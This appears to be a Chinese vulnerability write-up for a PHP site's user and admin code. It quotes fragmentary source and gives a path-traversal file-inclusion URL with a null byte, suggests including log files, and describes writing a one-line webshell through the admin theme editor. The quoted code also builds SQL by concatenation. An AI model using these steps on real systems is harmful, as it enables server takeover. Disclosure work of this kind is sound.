// upload\i\index.php

<?php
//略
$controller = !empty($_GET['c']) ? $_GET['c'] : 'index';
$action     = !empty($_GET['a']) ? $_GET['a'] : 'index';
 
//
 
 //cookie 自动登陆 并判断 uri
if (isset($_COOKIE['cUser']) && $_COOKIE['cUser']['userID'] != 0) {
    $userID = GetCUserID();
    $domain = GetCUserDomain();
    $sql = 'SELECT * FROM members WHERE userID = "'.$userID.'"';
    $arrRow = $objC -> GetRow($sql);
    //
        }
    }
}else if($domain == 'c' || $domain == 'a' || $domain == ''){
    $domain = GetCUserDomain();
    $params['controller'] = $controller;
    $params['action']     = $action;
    $params['domain']   = $domain;
}
 
//
 
$filePath   = CONTROLLER_PATH . $classname.'.php'; 
//

利用方法：http://www.2cto.com /i/index.php?c=/../robots.txt%00

可以考虑包含日志等。 （鸡肋）

后台shell篇：

<?php
//  upload\admin\themedetail.php
//
if(isset($_POST['content'])){
 
    $content = stripslashes(htmlspecialchars_decode($_POST['content']));
    
    $theme = $_POST['theme'];
    $file = $_POST['file'];
    if(!array_key_exists($file,$files))die('不存在此模板文件');
    if(!preg_match("/^\w+\/$/",$theme))die('模板路径异常');
    $path = TEMPLATES.'theme/'.$theme.$file;
    if(is_file($path)){
        $rs = file_put_contents($path,$content);
        if($rs)
            flushHTML('模板修改成功！<br />');
        //www.2cto.com
 
    }
//
}else{
    if($_GET['theme']){
        $theme = $_GET['theme'];
    }else{
        $theme = THEME_PATH;
    }
    
    $path = TEMPLATES.'theme/'.$theme.$_GET['file'];
    if(is_file($path)){
        $content = htmlspecialchars(getContent($path));
        $objS -> assign("content",$content);
        $objS -> assign("theme",$theme);
        $objS -> assign("file",$_GET['file']);
        $objS -> display("admin/themedetail.tpl");
    }
    //
 
    }
}
 
 

//利用方法：直接编辑写入一句话。注入key的问题。

http://t.qq.com/MakeBug

修复：针对性修复